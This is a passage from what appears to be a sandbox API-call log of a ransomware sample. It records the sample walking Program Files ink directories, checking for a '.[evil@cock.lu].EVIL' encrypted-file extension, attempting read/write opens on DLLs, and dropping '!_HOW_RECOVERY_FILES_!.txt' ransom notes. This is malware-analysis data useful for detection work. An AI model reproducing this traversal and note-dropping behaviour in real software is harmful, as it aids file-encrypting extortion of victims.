_SubStr="tipskins.dll") returned 0x0 [0088.721] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll") returned 0x40 [0088.721] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.721] GetLastError () returned 0x5 [0088.721] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.721] wcsstr (_Str="tiptsf.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.721] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll") returned 62 [0088.721] wcscmp (_String1="tiptsf.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.722] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tiptsf.dll") returned 0x0 [0088.722] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll") returned 0x3e [0088.722] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.722] GetLastError () returned 0x5 [0088.722] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.722] wcsstr (_Str="tpcps.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.722] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll") returned 61 [0088.722] wcscmp (_String1="tpcps.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.722] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tpcps.dll") returned 0x0 [0088.722] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll") returned 0x3d [0088.722] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.722] GetLastError () returned 0x5 [0088.722] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.722] wcsstr (_Str="tr-TR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.722] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 57 [0088.722] wcscmp (_String1=".", _String2="tr-TR") returned -1 [0088.722] wcscmp (_String1="..", _String2="tr-TR") returned -1 [0088.722] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 0x39 [0088.722] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 0x0 [0088.722] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*" [0088.722] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd5c0 [0088.722] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.723] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\.") returned 59 [0088.723] wcscmp (_String1=".", _String2=".") returned 0 [0088.723] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.723] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.723] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\..") returned 60 [0088.723] wcscmp (_String1=".", _String2="..") returned -1 [0088.723] wcscmp (_String1="..", _String2="..") returned 0 [0088.723] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.723] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.723] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui") returned 73 [0088.723] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.723] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.723] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui") returned 0x49 [0088.723] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.723] GetLastError () returned 0x5 [0088.723] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.723] FindClose (in: hFindFile=0x84b11dd5c0 | out: hFindFile=0x84b11dd5c0) returned 1 [0088.723] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 0x39 [0088.723] strlen (_Str="${KEY}") returned 0x6 [0088.723] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.723] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.723] strlen (_Str="${CODE}") returned 0x7 [0088.723] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.723] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.723] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.723] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.724] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.724] __uncaught_exception () returned 0x84b1160800 [0088.724] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.725] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.725] wcsstr (_Str="uk-UA", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.725] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 57 [0088.725] wcscmp (_String1=".", _String2="uk-UA") returned -1 [0088.725] wcscmp (_String1="..", _String2="uk-UA") returned -1 [0088.725] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 0x39 [0088.725] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 0x0 [0088.725] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*" [0088.725] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd5c0 [0088.725] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.725] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\.") returned 59 [0088.725] wcscmp (_String1=".", _String2=".") returned 0 [0088.725] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.725] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.725] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\..") returned 60 [0088.725] wcscmp (_String1=".", _String2="..") returned -1 [0088.725] wcscmp (_String1="..", _String2="..") returned 0 [0088.725] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.725] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.725] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui") returned 73 [0088.725] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.725] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.725] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui") returned 0x49 [0088.725] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.726] GetLastError () returned 0x5 [0088.726] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.726] FindClose (in: hFindFile=0x84b11dd5c0 | out: hFindFile=0x84b11dd5c0) returned 1 [0088.726] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 0x39 [0088.726] strlen (_Str="${KEY}") returned 0x6 [0088.726] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.726] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.726] strlen (_Str="${CODE}") returned 0x7 [0088.726] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.726] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.726] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.726] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.726] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.726] __uncaught_exception () returned 0x84b1160800 [0088.726] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.727] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.727] wcsstr (_Str="zh-CN", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.727] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 57 [0088.727] wcscmp (_String1=".", _String2="zh-CN") returned -1 [0088.727] wcscmp (_String1="..", _String2="zh-CN") returned -1 [0088.727] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 0x39 [0088.727] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 0x0 [0088.727] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*" [0088.727] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd080 [0088.727] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.727] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\.") returned 59 [0088.727] wcscmp (_String1=".", _String2=".") returned 0 [0088.727] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.727] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.727] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\..") returned 60 [0088.727] wcscmp (_String1=".", _String2="..") returned -1 [0088.727] wcscmp (_String1="..", _String2="..") returned 0 [0088.727] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.727] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.727] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui") returned 73 [0088.727] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.727] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.727] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui") returned 0x49 [0088.728] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.728] GetLastError () returned 0x5 [0088.728] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.728] FindClose (in: hFindFile=0x84b11dd080 | out: hFindFile=0x84b11dd080) returned 1 [0088.728] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 0x39 [0088.728] strlen (_Str="${KEY}") returned 0x6 [0088.728] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.728] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.728] strlen (_Str="${CODE}") returned 0x7 [0088.728] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.728] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.728] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.728] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.729] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.729] __uncaught_exception () returned 0x84b1160800 [0088.729] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.729] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.729] wcsstr (_Str="zh-HK", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.729] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK") returned 57 [0088.730] wcscmp (_String1=".", _String2="zh-HK") returned -1 [0088.730] wcscmp (_String1="..", _String2="zh-HK") returned -1 [0088.730] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK") returned 0x39 [0088.730] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK") returned 0x0 [0088.730] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*" [0088.730] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dde60 [0088.730] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.730] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\.") returned 59 [0088.730] wcscmp (_String1=".", _String2=".") returned 0 [0088.730] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.730] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.730] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\..") returned 60 [0088.730] wcscmp (_String1=".", _String2="..") returned -1 [0088.730] wcscmp (_String1="..", _String2="..") returned 0 [0088.730] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.730] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.730] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui") returned 73 [0088.730] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.730] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.730] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui") returned 0x49 [0088.730] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-hk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.731] GetLastError () returned 0x5 [0088.731] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.731] FindClose (in: hFindFile=0x84b11dde60 | out: hFindFile=0x84b11dde60) returned 1 [0088.731] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK") returned 0x39 [0088.731] strlen (_Str="${KEY}") returned 0x6 [0088.731] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.731] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.731] strlen (_Str="${CODE}") returned 0x7 [0088.731] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.731] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.731] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.731] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.731] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.731] __uncaught_exception () returned 0x84b1160800 [0088.731] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.732] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.732] wcsstr (_Str="zh-TW", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.732] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 57 [0088.732] wcscmp (_String1=".", _String2="zh-TW") returned -1 [0088.732] wcscmp (_String1="..", _String2="zh-TW") returned -1 [0088.732] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 0x39 [0088.732] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 0x0 [0088.732] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*" [0088.732] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd380 [0088.733] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.733] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\.") returned 59 [0088.733] wcscmp (_String1=".", _String2=".") returned 0 [0088.733] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.733] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.733] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\..") returned 60 [0088.733] wcscmp (_String1=".", _String2="..") returned -1 [0088.733] wcscmp (_String1="..", _String2="..") returned 0 [0088.733] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.733] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.733] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui") returned 73 [0088.733] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.733] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.733] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui") returned 0x49 [0088.733] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.733] GetLastError () returned 0x5 [0088.733] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.733] FindClose (in: hFindFile=0x84b11dd380 | out: hFindFile=0x84b11dd380) returned 1 [0088.733] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 0x39 [0088.733] strlen (_Str="${KEY}") returned 0x6 [0088.733] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.733] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.733] strlen (_Str="${CODE}") returned 0x7 [0088.733] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.733] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.733] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.733] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.734] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.734] __uncaught_exception () returned 0x84b1160800 [0088.734] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.735] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0088.735] FindClose (in: hFindFile=0x84b11dd260 | out: hFindFile=0x84b11dd260) returned 1 [0088.735] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink") returned 0x33 [0088.735] strlen (_Str="${KEY}") returned 0x6 [0088.735] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 